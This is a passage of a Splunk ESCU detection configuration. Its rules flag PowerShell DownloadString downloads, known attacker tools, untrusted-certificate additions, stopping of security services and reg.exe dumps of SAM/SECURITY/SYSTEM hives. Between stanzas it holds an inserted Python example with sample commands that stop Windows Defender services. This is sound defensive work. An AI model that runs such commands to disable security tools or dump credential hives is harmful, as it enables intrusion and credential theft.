If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present and filtering will need to occur by parent process or command line argument. It may be required to modify this query to an EDR product for more granular coverage. action.escu.creation_date = 2023-04-05 action.escu.modification_date = 2023-04-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Any Powershell DownloadString - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Winter Vivern", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "HAFNIUM Group", "Data Destruction", "IcedID", "SysAid On-Prem Software CVE-2023-47246 Vulnerability", "Phemedrone Stealer"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$. This behavior identifies the use of DownloadString within PowerShell. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Any Powershell DownloadString - Rule action.correlationsearch.annotations = {"analytic_story": ["Winter Vivern", "Ingress Tool Transfer", "Hermetic Wiper", "Malicious PowerShell", "HAFNIUM Group", "Data Destruction", "IcedID", "SysAid On-Prem Software CVE-2023-47246 Vulnerability", "Phemedrone Stealer"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation", "Command and Control"], "mitre_attack": ["T1059", "T1059.001", "T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of PowerShell downloading a file using `DownloadString` method. This particular method is utilized in many different PowerShell frameworks to download files and output to disk. Identify the source (IP/domain) and destination file and triage appropriately. If AMSI logging or PowerShell transaction logs are available, review for further details of the implant. 
action.notable.param.rule_title = Any Powershell DownloadString action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=*.DownloadString* by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `any_powershell_downloadstring_filter` [ESCU - Attacker Tools On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the use of tools that are commonly exploited by cybercriminals since these tools are usually associated with malicious activities such as unauthorized access, network scanning, or data exfiltration and pose a significant threat to an organization's security infrastructure. It also provides enhanced visibility into potential security threats and helps to proactively detect and respond to mitigate the risks associated with cybercriminal activities. This detection is made by examining the process activity on the host, specifically focusing on processes that are known to be associated with attacker tool names. This detection is important because it acts as an early warning system for potential security incidents that allows you to respond to security incidents promptly. False positives might occur due to legitimate administrative activities that can resemble malicious actions. 
You must develop a comprehensive understanding of typical endpoint activities and behaviors within the organization to accurately interpret and respond to the alerts generated by this analytic. This ensures a proper balance between precision and minimizing false positives. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Reconnaissance"], "mitre_attack": ["T1036.005", "T1036", "T1003", "T1595"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the use of tools that are commonly exploited by cybercriminals since these tools are usually associated with malicious activities such as unauthorized access, network scanning, or data exfiltration and pose a significant threat to an organization's security infrastructure. It also provides enhanced visibility into potential security threats and helps to proactively detect and respond to mitigate the risks associated with cybercriminal activities. This detection is made by examining the process activity on the host, specifically focusing on processes that are known to be associated with attacker tool names. This detection is important because it acts as an early warning system for potential security incidents that allows you to respond to security incidents promptly. False positives might occur due to legitimate administrative activities that can resemble malicious actions. You must develop a comprehensive understanding of typical endpoint activities and behaviors within the organization to accurately interpret and respond to the alerts generated by this analytic. This ensures a proper balance between precision and minimizing false positives. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. 
To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some administrator activity can be potentially triggered, please add those users to the filter macro. action.escu.creation_date = 2024-01-01 action.escu.modification_date = 2024-01-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Attacker Tools On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Monitor for Unauthorized Software", "XMRig", "SamSam Ransomware", "Unusual Processes", "CISA AA22-264A"] action.risk = 1 action.risk.param._risk_message = An attacker tool $process_name$,listed in attacker_tools.csv is executed on host $dest$ by User $user$. 
This process $process_name$ is known to do- $description$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Attacker Tools On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor for Unauthorized Software", "XMRig", "SamSam Ransomware", "Unusual Processes", "CISA AA22-264A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Reconnaissance"], "mitre_attack": ["T1036.005", "T1036", "T1003", "T1595"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the use of tools that are commonly exploited by cybercriminals since these tools are usually associated with malicious activities such as unauthorized access, network scanning, or data exfiltration and pose a significant threat to an organization's security infrastructure. It also provides enhanced visibility into potential security threats and helps to proactively detect and respond to mitigate the risks associated with cybercriminal activities. This detection is made by examining the process activity on the host, specifically focusing on processes that are known to be associated with attacker tool names. This detection is important because it acts as an early warning system for potential security incidents that allows you to respond to security incidents promptly. False positives might occur due to legitimate administrative activities that can resemble malicious actions. 
You must develop a comprehensive understanding of typical endpoint activities and behaviors within the organization to accurately interpret and respond to the alerts generated by this analytic. This ensures a proper balance between precision and minimizing false positives. action.notable.param.rule_title = Attacker Tools On Endpoint action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process values(Processes.parent_process) as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown Processes.user!=unknown by Processes.dest Processes.user Processes.process_name Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | lookup attacker_tools attacker_tool_names AS process_name OUTPUT description | search description !=false| `attacker_tools_on_endpoint_filter` [ESCU - Attempt To Add Certificate To Untrusted Store - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects whether a process is attempting to add a certificate to the untrusted certificate store, which might result in security tools being disabled. The detection is made by focusing on process activities and command-line arguments that are related to the 'certutil -addstore' command. This detection is important because it helps to identify attackers who might add a certificate to the untrusted certificate store to disable security tools and gain unauthorized access to a system. 
False positives might occur since legitimate reasons might exist for a process to add a certificate to the untrusted certificate store, such as system administration tasks. Next steps include conducting an extensive triage and investigation prior to taking any action. Additionally, you must understand the importance of trust and its subversion in system security. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1553.004", "T1553"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects whether a process is attempting to add a certificate to the untrusted certificate store, which might result in security tools being disabled. The detection is made by focusing on process activities and command-line arguments that are related to the 'certutil -addstore' command. This detection is important because it helps to identify attackers who might add a certificate to the untrusted certificate store to disable security tools and gain unauthorized access to a system. False positives might occur since legitimate reasons might exist for a process to add a certificate to the untrusted certificate store, such as system administration tasks. Next steps include conducting an extensive triage and investigation prior to taking any action. Additionally, you must understand the importance of trust and its subversion in system security. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = There may be legitimate reasons for administrators to add a certificate to the untrusted certificate store. In such cases, this will typically be done on a large number of systems. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Attempt To Add Certificate To Untrusted Store - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Disabling Security Tools"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to add a certificate to the store on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 35}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 35}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Attempt To Add Certificate To Untrusted Store - Rule action.correlationsearch.annotations = {"analytic_story": ["Disabling Security Tools"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1553.004", "T1553"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects whether a process is attempting to add a certificate to the untrusted certificate store, which might result in security tools being disabled. The detection is made by focusing on process activities and command-line arguments that are related to the 'certutil -addstore' command. This detection is important because it helps to identify attackers who might add a certificate to the untrusted certificate store to disable security tools and gain unauthorized access to a system. False positives might occur since legitimate reasons might exist for a process to add a certificate to the untrusted certificate store, such as system administration tasks. Next steps include conducting an extensive triage and investigation prior to taking any action. Additionally, you must understand the importance of trust and its subversion in system security. 
action.notable.param.rule_title = Attempt To Add Certificate To Untrusted Store action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where `process_certutil` (Processes.process=*-addstore*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `attempt_to_add_certificate_to_untrusted_store_filter` [ESCU - Attempt To Stop Security Service - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects attempts to stop security-related services on the endpoint and helps to mitigate potential threats earlier, thereby minimizing the impact on the organization's security. The detection is made by using a Splunk query that searches for processes that involve the "sc.exe" command and include the phrase "stop" in their command. The query collects information such as the process name, process ID, parent process, user, destination, and timestamps. The detection is important because attempts to stop security-related services can indicate malicious activity or an attacker's attempt to disable security measures. This can impact the organization's security posture and can lead to the compromise of the endpoint and potentially the entire network. Disabling security services can allow attackers to gain unauthorized access, exfiltrate sensitive data, or launch further attacks, such as malware installation or privilege escalation. 
False positives might occur since there might be legitimate reasons for stopping these services in certain situations. Therefore, you must exercise caution and consider the context of the activity before taking any action. Next steps include reviewing the identified process and its associated details. You must also investigate any on-disk artifacts related to the process and review concurrent processes to determine the source of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects attempts to stop security-related services on the endpoint and helps to mitigate potential threats earlier, thereby minimizing the impact on the organization's security. The detection is made by using a Splunk query that searches for processes that involve the "sc.exe" command and include the phrase "stop" in their command. The query collects information such as the process name, process ID, parent process, user, destination, and timestamps. The detection is important because attempts to stop security-related services can indicate malicious activity or an attacker's attempt to disable security measures. This can impact the organization's security posture and can lead to the compromise of the endpoint and potentially the entire network. Disabling security services can allow attackers to gain unauthorized access, exfiltrate sensitive data, or launch further attacks, such as malware installation or privilege escalation. False positives might occur since there might be legitimate reasons for stopping these services in certain situations. Therefore, you must exercise caution and consider the context of the activity before taking any action. Next steps include reviewing the identified process and its associated details. 
You must also investigate any on-disk artifacts related to the process and review concurrent processes to determine the source of the attack. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified. Attempts to disable security-related services should be identified and understood. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Attempt To Stop Security Service - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["WhisperGate", "Graceful Wipe Out Attack", "Disabling Security Tools", "Data Destruction", "Azorult", "Trickbot"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified attempting to disable security services on endpoint $dest$ by user $user$. 
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 20}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Attempt To Stop Security Service - Rule
action.correlationsearch.annotations = {"analytic_story": ["WhisperGate", "Graceful Wipe Out Attack", "Disabling Security Tools", "Data Destruction", "Azorult", "Trickbot"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects attempts to stop security-related services on the endpoint and helps to mitigate potential threats earlier, thereby minimizing the impact on the organization's security. The detection uses a Splunk query that searches for `sc.exe` executions (and `net.exe`/`net1.exe`, through the `process_net` macro) whose command line contains " stop ", then keeps only those whose target is categorized as a security service in `security_services_lookup`. The query collects information such as the process name, process ID, parent process, user, destination, and timestamps. The detection is important because attempts to stop security-related services can indicate malicious activity or an attacker's attempt to disable security measures. This can impact the organization's security posture and can lead to the compromise of the endpoint and potentially the entire network. Disabling security services can allow attackers to gain unauthorized access, exfiltrate sensitive data, or launch further attacks, such as malware installation or privilege escalation. False positives might occur since there might be legitimate reasons for stopping these services in certain situations. Therefore, you must exercise caution and consider the context of the activity before taking any action. Next steps include reviewing the identified process and its associated details. You must also investigate any on-disk artifacts related to the process and review concurrent processes to determine the source of the attack.
action.notable.param.rule_title = Attempt To Stop Security Service
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = sc.exe Processes.process="* stop *" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | lookup security_services_lookup service as process OUTPUTNEW category, description | search category=security | `attempt_to_stop_security_service_filter`

[ESCU - Attempted Credential Dump From Registry via Reg exe - Rule]
action.escu = 0
action.escu.enabled = 1
description = Monitor for execution of `reg.exe` (directly or wrapped in `cmd.exe`) with a `save` parameter targeting the SAM, SECURITY, or SYSTEM hives under HKLM. These hives hold hashed credentials, and the boot key needed to decrypt them, which attackers copy to disk in order to crack them offline.
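The following Python is an added worked example and not part of the ESCU content: it mirrors the `ESCU - Attempt To Stop Security Service - Rule` search above over constructed CIM `Endpoint.Processes` rows (process name `sc.exe`, or the `net.exe`/`net1.exe` pair the `process_net` macro covers, a " stop " token on the command line, then the `security_services_lookup` step and the `category=security` filter). The lookup rows, hosts, users and command lines are constructed. The example assumes the real lookup is wildcard-matched on its `service` field, since `lookup ... service as process` against a whole command line can only return rows if it is.

```python
import fnmatch

# Constructed stand-in for security_services_lookup (patterns are made up).
# The rule looks up the full command line as "service", so this only works if
# the lookup is wildcard-matched on that field (assumption about the real lookup).
SECURITY_SERVICES_LOOKUP = [
    {"service": "*windefend*", "category": "security", "description": "Windows Defender"},
    {"service": "*sense*",     "category": "security", "description": "Microsoft Defender for Endpoint"},
    {"service": "*mcafee*",    "category": "security", "description": "McAfee"},
    {"service": "*spooler*",   "category": "system",   "description": "Print Spooler"},
]

# Processes.process_name = sc.exe, plus what the `process_net` macro covers.
STOP_PROCESS_NAMES = {"sc.exe", "net.exe", "net1.exe"}


def spl_match(value, pattern):
    """Case-insensitive SPL-style wildcard match; only `*` is used in these patterns."""
    return fnmatch.fnmatchcase(value.lower(), pattern.lower())


def lookup_rows(process):
    """All lookup rows whose wildcard pattern matches the command line."""
    return [row for row in SECURITY_SERVICES_LOOKUP if spl_match(process, row["service"])]


def attempt_to_stop_security_service(events):
    """Mirror of the rule: name filter, "* stop *", lookup, `search category=security`."""
    hits = []
    for ev in events:
        if ev["process_name"].lower() not in STOP_PROCESS_NAMES:
            continue
        if not spl_match(ev["process"], "* stop *"):
            continue
        rows = lookup_rows(ev["process"])
        security = [r["description"] for r in rows if r["category"] == "security"]
        if not security:
            continue  # service unknown to the lookup, or not categorized as security
        hits.append({**ev, "description": security})
    return hits


SAMPLE_EVENTS = [  # constructed Endpoint.Processes rows
    {"dest": "ws01", "user": "CORP\\alice", "parent_process_name": "cmd.exe",
     "process_name": "sc.exe", "process": "sc.exe stop WinDefend"},
    {"dest": "ws02", "user": "SYSTEM", "parent_process_name": "powershell.exe",
     "process_name": "net.exe", "process": "net stop Sense /y"},
    {"dest": "ws03", "user": "CORP\\bob", "parent_process_name": "cmd.exe",
     "process_name": "sc.exe", "process": "sc.exe \\\\ws09 stop WinDefend"},  # remote stop still matches
    {"dest": "ws04", "user": "CORP\\helpdesk", "parent_process_name": "cmd.exe",
     "process_name": "net1.exe", "process": "net1 stop Spooler"},            # category=system: dropped
    {"dest": "ws05", "user": "CORP\\alice", "parent_process_name": "cmd.exe",
     "process_name": "sc.exe", "process": "sc.exe query WinDefend"},          # no " stop "
    {"dest": "ws06", "user": "CORP\\alice", "parent_process_name": "explorer.exe",
     "process_name": "powershell.exe", "process": "powershell -c Stop-Service WinDefend"},  # outside the rule's scope
    {"dest": "ws07", "user": "CORP\\carol", "parent_process_name": "cmd.exe",
     "process_name": "sc.exe", "process": "sc.exe stop NonsenseSvc"},         # "*sense*" over-matches
]

if __name__ == "__main__":
    for h in attempt_to_stop_security_service(SAMPLE_EVENTS):
        print(f"{h['dest']}: {h['parent_process_name']} -> {h['process_name']} {h['description']}: {h['process']}")
```

The last sample row shows the cost of a wildcard lookup over the whole command line: any command line containing `sense` is tagged as a security service, so tune `attempt_to_stop_security_service_filter` on parent process or user rather than loosening the lookup further.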
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = Monitor for execution of `reg.exe` (directly or wrapped in `cmd.exe`) with a `save` parameter targeting the SAM, SECURITY, or SYSTEM hives under HKLM. These hives hold hashed credentials, and the boot key needed to decrypt them, which attackers copy to disk in order to crack them offline.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = None identified.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Attempted Credential Dump From Registry via Reg exe - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Industroyer2", "Windows Registry Abuse", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "Data Destruction"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to save credential-bearing registry hives to disk.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Attempted Credential Dump From Registry via Reg exe - Rule
action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "Windows Registry Abuse", "Credential Dumping", "CISA AA23-347A", "DarkSide Ransomware", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Monitor for execution of `reg.exe` (directly or wrapped in `cmd.exe`) with a `save` parameter targeting the SAM, SECURITY, or SYSTEM hives under HKLM. These hives hold hashed credentials, and the boot key needed to decrypt them, which attackers copy to disk in order to crack them offline.
action.notable.param.rule_title = Attempted Credential Dump From Registry via Reg exe
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=reg* OR Processes.process_name=cmd* Processes.process=*save* (Processes.process=*HKEY_LOCAL_MACHINE\\Security* OR Processes.process=*HKEY_LOCAL_MACHINE\\SAM* OR Processes.process=*HKEY_LOCAL_MACHINE\\System* OR Processes.process=*HKLM\\Security* OR Processes.process=*HKLM\\System* OR Processes.process=*HKLM\\SAM*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `attempted_credential_dump_from_registry_via_reg_exe_filter`

[ESCU - Auto Admin Logon Registry Entry - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects a suspicious registry modification that enables automatic administrator logon on a host: `AutoAdminLogon` set to 1 under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`. BlackMatter ransomware used this technique to log back on automatically after forcing a safe-mode boot, so that it could continue encrypting the network. This is not common practice; treat it as a suspicious TTP and investigate any alert on the network.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects a suspicious registry modification that enables automatic administrator logon on a host: `AutoAdminLogon` set to 1 under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`. BlackMatter ransomware used this technique to log back on automatically after forcing a safe-mode boot, so that it could continue encrypting the network. This is not common practice; treat it as a suspicious TTP and investigate any alert on the network.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the official Sysmon TA. https://splunkbase.splunk.com/app/5709
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-04-11
action.escu.modification_date = 2023-04-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Auto Admin Logon Registry Entry - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BlackMatter Ransomware", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Registry key $registry_key_name$ was modified with value $registry_value_name$ to prepare automatic admin logon on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Auto Admin Logon Registry Entry - Rule
action.correlationsearch.annotations = {"analytic_story": ["BlackMatter Ransomware", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1552.002", "T1552"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects a suspicious registry modification that enables automatic administrator logon on a host: `AutoAdminLogon` set to 1 under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon`. BlackMatter ransomware used this technique to log back on automatically after forcing a safe-mode boot, so that it could continue encrypting the network. This is not common practice; treat it as a suspicious TTP and investigate any alert on the network.
action.notable.param.rule_title = Auto Admin Logon Registry Entry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" AND Registry.registry_value_name=AutoAdminLogon AND Registry.registry_value_data=1) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `auto_admin_logon_registry_entry_filter`

[ESCU - Batch File Write to System32 - Rule]
action.escu = 0
action.escu.enabled = 1
